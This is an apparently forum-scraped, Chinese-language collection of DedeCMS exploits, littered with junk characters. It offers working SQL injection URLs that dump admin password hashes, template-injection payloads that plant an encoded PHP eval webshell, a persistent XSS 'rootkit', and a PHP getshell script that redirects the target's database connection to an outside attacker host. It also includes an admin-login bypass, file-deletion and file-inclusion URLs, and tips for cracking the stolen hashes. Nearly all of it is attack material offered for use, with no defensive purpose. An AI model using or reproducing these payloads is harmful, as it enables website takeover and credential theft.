|
|
, Y+ r2 | n I1 o# ?; ?) c+ lDedecms 5.6 rss注入漏洞. F# I) y" W& U
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
6 z7 s. p5 P* z% Z
7 x9 U, S/ F" P4 n- ]7 |
- I, \9 B: n, C" j3 c, i6 I B
/ W7 b+ Q7 F" B6 `5 V
% w4 C( P& y6 a" t e/ m4 V1 I4 ^+ d' W7 ]+ V/ F$ }1 h
+ Q5 g4 |8 Q h9 H4 ?8 F
6 g% l4 i) W0 t. q- ]
* D1 }& S$ s0 a8 ZDedeCms v5.6 嵌入恶意代码执行漏洞
+ B5 R$ x d+ t( f1 M. q6 Z注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}1 f& A( W! R3 h& r7 a" U
发表后查看或修改即可执行
8 \; q$ X M- I- U) _a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
, ]: Y* U2 q( I: ?4 ?- |生成x.php 密码xiao,直接生成一句话。
$ j$ d: Q0 L" t4 S
/ d& y0 f' ]8 W2 V3 T" x! b$ Q5 I( ~/ K/ | |
: c8 q' q) p/ T" b4 l
. a5 D! C/ ?! e2 Q. B7 W6 Z
& S0 M& j9 F8 g
`0 ^6 U) V6 R9 {4 X! L% m( F1 e& D) Y. I4 P
3 P3 i. m `. v- Z+ \# u
Dede 5.6 GBK SQL注入漏洞
8 `$ W0 G: s( V2 H+ s) Dhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';; f# [9 P+ e! j( p3 X9 O
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe' F+ a* M9 g) ? _! o, D! G
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7! D" X3 X7 j' R6 O
! E, u7 [- V$ y% R
$ _# l$ y/ e/ K
9 I2 s1 c8 f, u- l3 N; n" Z& C" G7 U9 }* E+ O3 U2 g9 {8 H" ~
. Z6 F9 U" M; c/ r3 e+ i- ?
0 m4 C" ^- I4 E1 }! U3 a1 C3 \, g
& b2 b$ Q. u' q- E! {) _8 Q
% H3 \, c2 _3 ?7 m! _8 E, @' ?DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞2 t; W* m8 h3 w s- C- I1 I# ~: A
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 7 i2 E8 L* z; K" Y- y
+ f9 Y3 [ S( g4 F i% o/ T
2 R- C: t2 ?, ]1 x% _: r1 a% B1 C& U3 w
1 ]5 a( a% V' J& Y1 z( {
. a% @( x, ]& K+ n1 z% v! \7 e' q8 ^5 k5 u0 q" i7 ~2 A
DEDECMS 全版本 gotopage变量XSS漏洞
0 O0 p# g# g- w! A0 T- a$ a1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ( B( E6 h# }& q2 o" M' K N) s2 j$ f" z
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="" C7 F* n; J# ^' {3 L$ m
2 M0 a) L( n! h6 ]. G1 g. [- l
7 f- i- n* p0 P; ^$ I7 X2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
6 ^! |$ a8 n% Z6 r& ohttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
. U# V3 S) ?; \9 P" ~
' H6 y: f: X3 n6 v3 A
8 R1 q7 U: y& m; a" _- n# ]http://v57.demo.dedecms.com/dede/login.php* n! z$ n: d: C! m5 _9 f/ D
. k7 q7 J8 Y; v. \1 \' a
0 p; r4 T9 v: L# D3 @
color=Red]DeDeCMS(织梦)变量覆盖getshell. y# ~+ j. f% f. v1 }# }
#!usr/bin/php -w
' N$ W$ X2 m5 U' ?<?php9 q3 ^8 S5 Z ^2 M; c
error_reporting(E_ERROR);" u' j- @& }0 A' z ?$ T4 ^
set_time_limit(0);
8 E; @3 j" |1 Y1 e! ~( Aprint_r('
' e) N' i& ^! d2 T. EDEDEcms Variable Coverage- k% H/ [5 i1 H" ?# ~3 ~ x
Exploit Author: www.heixiaozi.comwww.webvul.com
7 h# q- l+ _0 D8 D2 r);
8 A9 `" [4 M- ?) f' p1 pecho "\r\n";: R9 j! q: u$ r% G. f' C: b. \2 P
if($argv[2]==null){
. H0 Z- y7 x2 R, a+ F5 _" bprint_r('2 W8 N+ i3 X6 K1 |! e
+---------------------------------------------------------------------------+
7 I0 U$ M% D, R* r1 mUsage: php '.$argv[0].' url aid path
7 c; s) d4 B! y+ b, S, Zaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
+ D$ x3 u4 M3 h: z; I u y" y# tExample:' t& }8 P; Q% l9 Y: Z- @
php '.$argv[0].' www.site.com 1 old
$ K" \5 X) a1 ~" r+---------------------------------------------------------------------------+
6 b/ {! I% W$ c0 S0 q/ {');, T- r3 t' r' J8 d+ Z
exit;& U/ q$ S9 D" a1 e" k9 H {
}( k/ F3 P% K) R8 J
$url=$argv[1];* N. |3 ^/ J2 P) M- h( }0 M; _: o
$aid=$argv[2];
5 W8 T4 n$ ^, S* m$path=$argv[3];8 C1 d- D+ v: H1 Y, b8 i9 k H
$exp=Getshell($url,$aid,$path);
: b. ]" L) U. Zif (strpos($exp,"OK")>12){
, Y6 x, ]& F% V( jecho "
7 X: b& d$ N \+ {* @3 x$ pExploit Success \n";% _2 w0 Z- y# W( |4 _: E$ P b1 W
if($aid==1)echo "2 U" N: T C1 y2 H
Shell:".$url."/$path/data/cache/fuck.php\n" ; W4 b4 Y/ k- G" Q
/ u% F1 C; W4 l
7 ^+ l3 ~4 d; c# U0 K5 D- z; g6 U
if($aid==2)echo ") f! H5 p) e6 N2 ^, p
Shell:".$url."/$path/fuck.php\n" ;
1 I) ^: m6 O) ]* _. L
7 Z" n6 |' o6 j
7 B9 n7 i3 q% }3 eif($aid==3)echo "- c, B' Z* O# A2 I8 j; e. n
Shell:".$url."/$path/plus/fuck.php\n";7 K* }. j) z2 y& Q8 Z2 L
6 ^8 u' \: ^" n
7 {8 U4 K/ @; M; I* x! H( j, H}else{6 B5 [/ f: q9 U- Q3 |0 [' e
echo "% {- ^; @) Y9 I2 |2 o4 ^* U; I# X. U
Exploit Failed \n";
" _! ?; w. Q; F: `}+ N- Y' Z; G# `
function Getshell($url,$aid,$path){5 \: e4 X; {* H) ^( _; e0 [+ o
$id=$aid;
% z7 P$ z5 F# r# x/ h0 L$host=$url;/ @( p7 c+ q% O
$port="80";3 r" w+ h+ q; ^2 V6 t' H
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";; |$ s4 E' L( Y* i7 |( N/ S& x' m" @
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";1 y# Q8 a n2 x1 a x0 C) P3 h. b
$data .= "Host: ".$host."\r\n";7 G' w* ~, V; b7 x" J% q
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";: ^$ T% C* y3 u6 z
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";& Q( O+ V8 @2 s9 S" I3 t3 ^( b6 |3 g
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";4 B. [* P6 ]) p
//$data .= "Accept-Encoding: gzip,deflate\r\n";$ {9 X7 \0 X& W' i( j3 C
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
0 b) p4 X& A5 D# H' _& b* P/ K" j$data .= "Connection: keep-alive\r\n";/ p( u+ F* A) |: F6 R* `; ?
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
5 X2 v8 {7 W% k, Y2 Z$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
Y- ~& u8 }& @- b/ z8 S+ A- M$data .= $content."\r\n";
$ x. h7 i# ^, V, a0 Y$ock=fsockopen($host,$port);
# W9 i# `2 S# H; v; cif (!$ock) {! C. k) f' X( U
echo "
8 l: _: N. X" FNo response from ".$host."\n";: h2 T6 ~+ R( e5 ?2 C
}8 {- K c: M, U7 } y( o: ~+ r6 C
fwrite($ock,$data);
3 l3 P, t" [: h' j Hwhile (!feof($ock)) {0 P- T' p$ W- u: ]$ x' B; q
$exp=fgets($ock, 1024);$ E3 S! b2 D, \5 C* X, l: X$ D
return $exp;$ y; G0 j* H8 K0 Z$ k
}
* C, M% d" ~ N}
( h: m# c; G- q0 F0 r4 Z8 _8 s6 n& e
. [4 T" B; e: ~1 y/ ]3 N* r% s6 m?>% V4 l/ s3 k g! W4 v
$ w5 D. l# D* V3 d5 M$ n! E' e8 s+ W
% H) U6 K( V* K6 T
7 _: \7 ?- A- ]5 l0 j+ ^8 c0 o: e- q4 g1 ]( q
- l) S! B+ _9 x- l7 I* j5 j9 N/ o, g7 M
4 l7 D: f& Y! Q7 u Z/ {8 G% p8 ?/ Z4 M" r; H. k, S8 W
; s d& @: o3 A) _3 p
# `+ E N+ c j, C+ g9 EDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
" s( r; Q4 D! _6 s+ v1 [- w. `! n2 \http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
* Y+ S+ O. B2 V0 ?* L' F: o
( }) l; @" d/ Q i4 H: Q6 e% j3 L
! z( Z7 P: x- z* J( j# k; S把上面validate=dcug改为当前的验证码,即可直接进入网站后台5 _) }# i7 P( ]" O- y" y$ e% I' {
- o$ q6 z4 Z! P( t! P; z
6 P0 T8 ~4 J& N7 ?1 K
此漏洞的前提是必须得到后台路径才能实现
$ U# H4 ]5 }( z* |" n
- F( T6 W5 B/ z9 a0 o! h5 ]) t, s" T
/ d$ y/ ]5 V' y! z3 M4 \- U% F1 M* i
8 f2 g9 [% T0 I! ?7 C9 z( j8 H
( J% x& ^# z% K0 ^+ h" Y3 \6 M1 H/ J5 r( g+ a; w \; b
3 n; G1 _* Y$ f
2 }; J$ w5 q! M8 T( v' w# v
) i, W/ h6 z0 c' u7 e. w6 v1 J5 e" Y, f3 c: V& e. E
Dedecms织梦 标签远程文件写入漏洞" u6 M, O: l' b( s* j
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');, Q5 o/ Z) l" T' b; R
2 ^# S7 `) \4 a3 x, f9 z
6 W M4 l( y# ?* m: r, D再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
6 q! F8 b7 O. D* G0 r! c<form action="" method="post" name="QuickSearch" id="QuickSearch">* i" {8 }7 x5 g* @5 ?
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />9 h$ y7 [% J0 ]4 Q* E4 f+ M' [
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />* K; u: Y" N& S: Z; S. N O: e
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
9 r+ \; n% j( o- d: a- r2 [<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
4 H ]% \: \* k<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />6 R. k! q/ [: n! U% K& @
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />6 _# q& Z% X% j! n1 m
<input type="text" value="true" name="nocache" style="width:400">1 W/ X8 N7 V9 o% ?, j
<input type="submit" value="提交" name="QuickSearchBtn"><br /># l3 n7 ~5 b% r! P2 p
</form>+ {! h& p+ |! |
<script>1 F0 I. o) P$ ?' p# Z
function addaction(); t u+ Q, ~2 b, V" { f
{# F$ p7 r D8 u- ^% B- S0 K
document.QuickSearch.action=document.QuickSearch.doaction.value;
: O2 E5 X' S( D* W3 Y* N4 S}
! j& M3 _/ r t4 e9 j+ c7 R3 r+ W</script>% b% k; ?( n _1 k# w7 K5 w, K) a
, C# Z' f$ a5 o0 `- }" q' V7 [$ o3 e! D# n
' a, t9 N8 Z/ C5 G9 @, k9 s9 }! w
$ { j; J# H8 ^, c7 P
4 ^) r3 V1 X: B2 ]7 P) f7 A$ q& q$ g. s; {. S0 P" Y- T& q3 N( b
' j: ?- j I: R' J" D8 O
( j1 P6 V) [8 B3 G6 n( m- f
9 b, Q6 S. q, ]7 n6 }$ y |: s7 b( w' u, P% b: c
DedeCms v5.6 嵌入恶意代码执行漏洞7 p3 O; Z0 G6 n- h s6 Z0 C
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
! u" z2 o/ F1 k+ j# P# aa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
# `/ M" I+ d! ?9 v8 a生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
5 I1 N' ?1 F+ _& J& hDedecms <= V5.6 Final模板执行漏洞* H8 }* \6 W. Z! i# Q, b
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
+ J3 A2 |# f( k- i! |% Nuploads/userup/2/12OMX04-15A.jpg9 ~# d5 ]0 ?* d. v; `2 s) M
i* ?9 P4 g1 w
* }% K. i" f! |. m模板内容是(如果限制图片格式,加gif89a):
% s; G2 e. n: P6 i! q: p{dede:name runphp='yes'}. C+ |' O K' w/ N
$fp = @fopen("1.php", 'a');1 }. h) z" E# [/ D! ~
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
& }0 d$ n$ r/ G6 i+ s/ q! A' f1 N@fclose($fp);
; @! F4 A6 g; }# m: g{/dede:name}
* t8 ^8 N# R9 m, n: L2 修改刚刚发表的文章,查看源文件,构造一个表单:/ l% p) k4 G" B
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">3 ^4 G K: ^$ y C( f* |
<input type="hidden" name="dopost" value="save" />/ ~& i0 {0 r1 f5 U: K/ t7 v1 h
<input type="hidden" name="aid" value="2" />
4 e& U1 E7 x% U<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
8 p2 \7 I. U" ?% ]<input type="hidden" name="channelid" value="1" />
; V5 X/ e8 \9 c; O7 n3 ?<input type="hidden" name="oldlitpic" value="" />
( f. F. C3 N* {! g1 Z% W; _<input type="hidden" name="sortrank" value="1275972263" />
: }& b, [% F7 ~+ o# V0 E& R( P' C' ^3 I8 m- \) R- g- ?
) E, R' o- {- g. `8 Q) F8 u% y" i
<div id="mainCp">: ?7 L+ W& M. X
<h3 class="meTitle"><strong>修改文章</strong></h3>
# x$ K4 p' M6 c) m, u( ?& Q% ]' ]
4 `% b4 @! p2 C<div class="postForm">4 \% D3 g/ E# W7 D7 Q5 s9 w0 F6 c" W
<label>标题:</label>
. ~% c, c. J2 j' U, z<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
- B# `/ }. [' z, w. d( y/ g( V6 S3 B
+ z/ V R* e: n
<label>标签TAG:</label>
2 b+ T( [- H$ Q' a<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)% P, O& c0 d/ S) J) V4 L
% U2 ^& x( U: J2 p3 q
) f6 N* u8 A& Y; N" V& E3 c+ @<label>作者:</label>
! D3 f n W, O; ~6 m<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
( z- ^4 R0 q4 J T, ^' A' v9 I" i3 [0 Y: }& c3 s
4 `, F2 O% h' G& y# f5 P0 M
<label>隶属栏目:</label>( p1 b/ W# i: @5 u6 x% G
<select name='typeid' size='1'>: h! B+ w4 V5 T( }* v
<option value='1' class='option3' selected=''>测试栏目</option>
+ s* Q- u: U" G8 L5 ] J</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)' d4 F# ~' }, B- I
( Q4 a/ k; L/ ~7 ^1 c: _
0 ^" A, j& s5 y( b" u
<label>我的分类:</label>
+ R. s9 Y" ~; B, H<select name='mtypesid' size='1'>$ ~ T) U2 ^- I3 c4 R6 u+ H m; V
<option value='0' selected>请选择分类...</option>
0 z/ F% \5 V5 h<option value='1' class='option3' selected>hahahha</option>1 X6 X$ V" f4 ^
</select>' b! A5 T0 B1 N" G
/ H z6 ?/ q( R, j. k W/ i1 z4 S
) o5 P8 s c; `6 Q0 ~. ]% }
<label>信息摘要:</label>$ M, V4 [3 W; H. I1 U5 ~
<textarea name="description" id="description">1111111</textarea>' I' [7 s" H" j" e% C, q/ Z
(内容的简要说明)
2 |' C$ a! v9 Q/ n& G5 u
) n, c1 r" @' z# _1 a: G' `- I! h1 ^+ J/ s* K" p! G
<label>缩略图:</label>, a! F- e8 i0 e7 _) r0 N
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
; S- @! }: F' z% H# _9 K' B- a1 [
( k9 r* t ?# A$ x* P6 A# k4 @4 V% b2 j# O
<input type='text' name='templet'8 [0 n7 W, J8 f1 m$ ]& x
value="../ uploads/userup/2/12OMX04-15A.jpg"># t% v+ t) D/ n4 G" `( f2 H5 [
<input type='text' name='dede_addonfields'
# Z9 u7 F6 e Ivalue="templet,htmltext;">(这里构造)
3 {- s e: k7 z* M</div>
/ P) Z" s+ d `+ j- F9 F1 T5 o$ m( X1 H
' Y* c4 N& B1 ~% b5 A+ z8 e) Y
<!-- 表单操作区域 -->5 ]2 @) q# u! j& e% F x( K) R
<h3 class="meTitle">详细内容</h3>3 I/ X' v3 o, f# Q& m
4 W( B, a7 c% C; z6 i. `6 E
/ _2 q* g7 j& w% `$ \, x, E
<div class="contentShow postForm">
b7 M/ ]# `3 y0 y<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>; w, B( d& j" Q6 P) [+ }# W, F$ w
; t4 t0 B# K' k2 ] i1 i# O
6 B& R w8 R! a* b<label>验证码:</label>. @0 g8 H7 y& s, ~+ M4 v
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
3 o! f; z# }2 k( J<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
' g. R5 }% @7 h5 b9 N+ u
1 p7 Z/ ]" U% @( w5 z1 m
8 z3 h6 q8 t9 {# e+ h+ ~$ E<button class="button2" type="submit">提交</button>
8 @' k7 r9 w; ~. g, A7 H) o<button class="button2 ml10" type="reset">重置</button>
* K3 }! w0 V. a! _! r8 t3 Z</div>, i. k5 R! k5 G+ \/ d0 B7 k! M
8 x! n2 m% E: @# P4 H7 n: k4 e& ^+ p1 g: l8 S
</div>
" k" M" t# \; z' x9 k6 Z0 [
! E- [5 Q. n2 p. d
% \$ [* @* O' B$ i% Y</form> \5 s+ m2 m- P9 `4 Q( |- E
' b* m; L6 H- o9 H& x8 C0 z! y% o, p5 j) _* r N/ n
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:( w- e U; r0 E( D( V& ]6 [2 V
假设刚刚修改的文章的aid为2,则我们只需要访问:
* [& R7 q4 h1 T. k& u/ Thttp://127.0.0.1/dede/plus/view.php?aid=2
7 ^- ]8 D7 L. X7 ~即可以在plus目录下生成webshell:1.php! j, K) F* w& l
* |$ J7 S0 a j9 b }& c8 G% V+ o
1 }3 v$ i8 o! e% q5 C( c
% Q( w6 {* E+ b
8 u5 T( v( w* |4 F- p5 m; \* ^
1 D* L* k! y$ _- v1 j H( H- U' k5 n, ^4 g7 g2 o
- {" b9 f+ G! @$ A& D( I
$ i% x! `. `; V1 R, E
( Z8 H* k0 F2 E0 ]5 Y/ p9 K- O- a# _6 `9 r: x3 b. ^, v- O
9 C$ a% f) \; x+ |' i) g; ~; s6 u# N2 n
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)6 b) E, g: ?" T
Gif89a{dede:field name='toby57' runphp='yes'}- v* i/ _2 X7 ~) k; ?. _3 H
phpinfo();( |7 g0 S( u( O3 t, w
{/dede:field}
# V* U0 H/ {* N% R& C# e& \* z保存为1.gif8 q5 x% U6 I( X5 F1 x- x8 `
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
6 f* I' N' z) ]" v<input type="hidden" name="aid" value="7" /> $ }; w; b$ f& [- k: j) ^) E( K
<input type="hidden" name="mediatype" value="1" />
8 F/ h& O @5 f( W6 T" B<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> * ^/ c& c! Y2 { G- K @# x0 z7 A
<input type="hidden" name="dopost" value="save" /> ( @- ~$ o7 `+ _% |4 ]
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
* C! s6 A, ?! ^1 S' e! X: _<input name="addonfile" type="file" id="addonfile"/>
! X" f2 ?0 I/ l) k) u( _" g<button class="button2" type="submit" >更改</button>
( V* \/ F, W" y7 B+ H" w8 V1 O</form> , A$ I# X* c- A* ^
! W( Y3 q6 t6 a! ~6 @4 q; y' H
/ a' X% j5 K) r6 k7 j构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
3 r: n: M9 P6 S$ L9 n发表文章,然后构造修改表单如下:- G: s3 j' ?- p) A0 A. p4 g( Z0 ^
+ k) |% m- N" Y k
# z8 Z# e Y# V% m) ?3 H<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
5 ? o) x; D* D& J* J<input type="hidden" name="dopost" value="save" />
% F8 |. }/ L( b3 q<input type="hidden" name="aid" value="2" /> 4 h6 D! p% P8 k
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> / B$ m+ @; j* K: t$ [+ D5 x# j" M- M
<input type="hidden" name="channelid" value="1" /> ) R- ?6 M1 W! e- @
<input type="hidden" name="oldlitpic" value="" />
2 N- {$ {: |+ ^* J0 p" k* I- G) l) j<input type="hidden" name="sortrank" value="1282049150" />
% P1 p) e. i+ @) ` ]) i<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 8 o/ c7 U$ L$ r1 r8 C6 E, ?
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> ! H6 [0 {* Y7 C: v2 h3 Y, |
<select name='typeid' size='1'>
+ o' u6 i' ^( x9 [* L! @<option value='1' class='option3' selected=''>Test</option>
) i8 p8 @ X+ A- @4 Q6 D<select name='mtypesid' size='1'>
; Z/ B7 d2 x& N% \9 H<option value='0' selected>请选择分类...</option>
" v2 Y* w! l; T* Z9 M<option value='1' class='option3' selected>aa</option></select>
6 y' ], }) h3 C0 E5 V' |: A1 n<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
, o5 c; Z& y- U2 e0 u<input type='hidden' name='dede_addonfields' value="templet"> 1 M8 e) [. O1 I! ?5 y( O
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 8 n$ Q. J1 }, u! W, l
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ( j$ i, o7 s4 x4 B
<button class="button2" type="submit">提交</button>
& n: E* M) _+ }* ]( p$ \3 Y</form>
' K4 R# `* M% I
+ F6 Q; X6 q3 z
* p/ j: @# U* U) s
/ X$ D# p9 T1 H. ~+ A
. u4 D9 x3 l+ u3 f* v7 h7 k% {* ^' j3 v
/ l9 S5 k) P2 q8 x
" r5 j; x- [0 n; @7 a' o% q( c7 T5 m
. V8 L% }; q$ v9 m( Z. p7 o
! N0 z( ^% H$ S e, n( q0 f, x U/ V8 _# q# F: H* @" _
9 C6 d5 N4 E9 E织梦(Dedecms)V5.6 远程文件删除漏洞1 i' S& d" r: Y8 F: K( Q+ z& w, m
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif, a# `4 e9 b* Q# d2 l
+ H6 h+ {' @0 @7 a. A+ T+ \1 L: c4 ]3 Y% B; [2 D9 T4 D
% z8 H. [$ N6 `) z! ~9 a
% a& b* K& F+ G1 e4 Z1 k1 F
) x4 U3 M9 m9 `0 i# {, a
& M9 k/ s' s9 ]# C0 I4 r; U
% u$ l7 o0 K5 G
# D4 u9 e2 }& b, ?$ N
. x! s2 `3 u! v2 ~% L: ^) ?+ N8 D% e$ a
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 $ Y5 B: U% D2 U! V' G/ n
http://www.test.com/plus/carbuya ... urn&code=../../
# O2 x! N$ P3 F, V" f0 v, u; Q* Y) U- h
_+ P, x) A. `7 b/ o% a8 p: X4 O
6 {8 e6 O2 ~) l! D: s
4 b$ X1 V& p/ }4 u, @/ L. n1 D
# _) G+ J% Z- {# s0 z3 D
2 Z/ X7 Q2 \* N \; w' b- h) e8 q- L3 H
, f$ W' c \4 t/ R4 t
2 Z! d5 i" R) v E
: q! M/ ^ I) ^+ MDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
. l/ `: ]) M1 gplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
9 r$ E' i* M' a2 {密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD50 H3 j7 y* z* C/ m
0 K0 S& Y- J: k7 @1 h/ E
# p' l' b5 y8 @- @- _, j
+ f4 ?( l9 o4 K- m9 ]& Q" g6 ^3 S2 _: }8 e, I4 |) ~" @
i( n. i0 E$ l8 S( J9 ]
6 T; X/ c8 d$ i) A* d2 [/ y7 I' n; v2 e& C( j2 [1 c& q* \
* v0 O/ B; v; Y5 ]8 {
: _$ \( ]8 X3 I7 ~ F) ~! v' i8 C3 B4 ?% C4 d
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
6 H( s5 z; k. g2 b D, vhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
( {/ \& e+ t& j- }# q
5 N7 y% A6 Y, \1 D9 c( p* F- J9 P: G5 M/ n
+ R- R$ n/ u+ A2 Z
1 l3 ^: y3 D7 s5 [) L ^' a
% s# ~0 E! v1 X, m* P! H& [8 P5 c# h5 V, v& A/ H+ |; G
; ]0 {3 j- Y6 [" ^0 L
! b4 o. Z' y" l8 t) A- W# l# M
0 x$ i8 Y- y, P6 ]9 r
( P U+ G$ \$ c3 {% E2 c
